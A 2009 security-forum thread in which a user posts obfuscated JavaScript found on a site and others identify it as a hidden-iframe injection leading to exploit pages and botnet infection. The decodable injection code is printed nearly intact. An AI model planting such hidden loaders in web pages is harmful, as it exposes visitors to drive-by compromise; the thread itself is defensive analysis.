Is this fishy script?

Talk about internet security, computer security, personal security, your social security number...
Post Reply
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Is this fishy script?

Post by luntrus » Thu Jun 18, 2009 9:42 am

Hi forum members,

Whenever you see code of a certain nature, your NoScript ears start to stick out. So when I stumbled onto this row code I want to know: "Is this normal code or suspicious obfuscated malcode?

Code: Select all

 EDITED for SECURITY REASONS with * and ^[/scr*pt type="text/j*v*script"^var qhEHJJekBOuKGRbXCPKz = "ewLOJ60ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ32ewLOJ119ewLOJ105ewLOJ100ewLOJ116ewLOJ104ewLOJ61ewLOJ34ewLOJ52ewLOJ56ewLOJ48ewLOJ34ewLOJ32ewLOJ104ewLOJ101ewLOJ105ewLOJ103ewLOJ104ewLOJ116ewLOJ61ewLOJ34ewLOJ54ewLOJ48ewLOJ34ewLOJ32ewLOJ115ewLOJ114ewLOJ99ewLOJ61ewLOJ34ewLOJ104ewLOJ116ewLOJ116ewLOJ112ewLOJ58ewLOJ47ewLOJ47ewLOJ104ewLOJ105ewLOJ116ewLOJ45ewLOJ115ewLOJ101ewLOJ110ewLOJ100ewLOJ101ewLOJ114ewLOJ115ewLOJ46ewLOJ99ewLOJ110ewLOJ47ewLOJ102ewLOJ105ewLOJ110ewLOJ100ewLOJ47ewLOJ105ewLOJ110ewLOJ46ewLOJ99ewLOJ103ewLOJ105ewLOJ63ewLOJ55ewLOJ34ewLOJ32ewLOJ115ewLOJ116ewLOJ121ewLOJ108ewLOJ101ewLOJ61ewLOJ34ewLOJ98ewLOJ111ewLOJ114ewLOJ100ewLOJ101ewLOJ114ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ112ewLOJ111ewLOJ115ewLOJ105ewLOJ116ewLOJ105ewLOJ111ewLOJ110ewLOJ58ewLOJ114ewLOJ101ewLOJ108ewLOJ97ewLOJ116ewLOJ105ewLOJ118ewLOJ101ewLOJ59ewLOJ32ewLOJ116ewLOJ111ewLOJ112ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ108ewLOJ101ewLOJ102ewLOJ116ewLOJ58ewLOJ45ewLOJ53ewLOJ48ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ59ewLOJ32ewLOJ102ewLOJ105ewLOJ108ewLOJ116ewLOJ101ewLOJ114ewLOJ58ewLOJ112ewLOJ114ewLOJ111ewLOJ103ewLOJ105ewLOJ100ewLOJ58ewLOJ68ewLOJ88ewLOJ73ewLOJ109ewLOJ97ewLOJ103ewLOJ101ewLOJ84ewLOJ114ewLOJ97ewLOJ110ewLOJ115ewLOJ102ewLOJ111ewLOJ114ewLOJ109ewLOJ46ewLOJ77ewLOJ105ewLOJ99ewLOJ114ewLOJ111ewLOJ115ewLOJ111ewLOJ102ewLOJ116ewLOJ46ewLOJ65ewLOJ108ewLOJ112ewLOJ104ewLOJ97ewLOJ40ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ61ewLOJ48ewLOJ41ewLOJ59ewLOJ32ewLOJ45ewLOJ109ewLOJ111ewLOJ122ewLOJ45ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ34ewLOJ62ewLOJ60ewLOJ47ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ62";var wqfYyLudgHIXoMexWJhX = qhEHJJekBOuKGRbXCPKz.split("ewLOJ");var XbidtJBvZLvVCbuBmoeS = "";for (var wnqkAUhXdPuBrdekmggM=1; wnqkAUhXdPuBrdekmggM<wqfYyLudgHIXoMexWJhX.length; wnqkAUhXdPuBrdekmggM++){XbidtJBvZLvVCbuBmoeS+=String.fromCharCode(wqfYyLudgHIXoMexWJhX[wnqkAUhXdPuBrdekmggM]);}var VyodIJUOXMuOEyNuLfLF = ""+XbidtJBvZLvVCbuBmoeS+"";document.write(""+VyodIJUOXMuOEyNuLfLF+"")^/script^

Like to hear your views on the matter,

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Iron/2.0.178.0 Safari/530.9

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Is this fishy script?

Post by Tom T. » Thu Jun 18, 2009 9:54 am

The only reason I can think of offhand for a single string of 1,737 characters is as an encryption key... and, uh, aren't those usually put into hex?
Especially when the entire string consists of

Code: Select all

ewLOJ*
repeated endlessly, where * = a two- or three-digit integer (decimal).

No code expert here, but I'd be very surprised if there were some legitimate, non-obfuscating use for such a string.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US at an expert level; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 diehard

mik33mik
Posts: 18
Joined: Fri Mar 20, 2009 11:59 am

Re: Is this fishy script?

Post by mik33mik » Thu Jun 18, 2009 12:06 pm

It's an obfuscated malicious script, in an invisible iframe, that redirect to a .cn site with a frame containing a porn site. This porn site has a javascript that redirect to a web server containing various exploits for adobe pdf reader, and flash player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009060816 Torfox/3.0.10

User avatar
therube
Ambassador
Posts: 7408
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Is this fishy script?

Post by therube » Thu Jun 18, 2009 3:07 pm

AVAST forum thread, my own website (that I built) suddenly has trojan horse - help!.

Oh, & if you do go about visiting the site in question, do use your head ;-).
(Earlier I found a different site with that same exploit, but can't seem to find it again?)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1pre) Gecko/20090601 SeaMonkey/2.0b1pre

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Is this fishy script?

Post by Tom T. » Fri Jun 19, 2009 6:13 am

mik33mik wrote:It's an obfuscated malicious script, in an invisible iframe, that redirect to a .cn site with a frame containing a porn site. This porn site has a javascript that redirect to a web server containing various exploits for adobe pdf reader, and flash player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.

mik33mik, thank you, and it's nice to have an advanced detective here! :) ... since the exploit uses iFrames, JS, Flash, and Adobe pdf, then even those who went there, with NoScript in full lockdown (no scripting, no iframes, no Flash) and with Adobe JS disabled, as it should be for those who persist in using this unsafe PDF reader when safer ones are present, would still be protected, true? .. thanks again for detailed explanation.

btw, may we ask how you knew? are you in the anti-malware business also? Just curious.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US at an expert level; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 diehard

Post Reply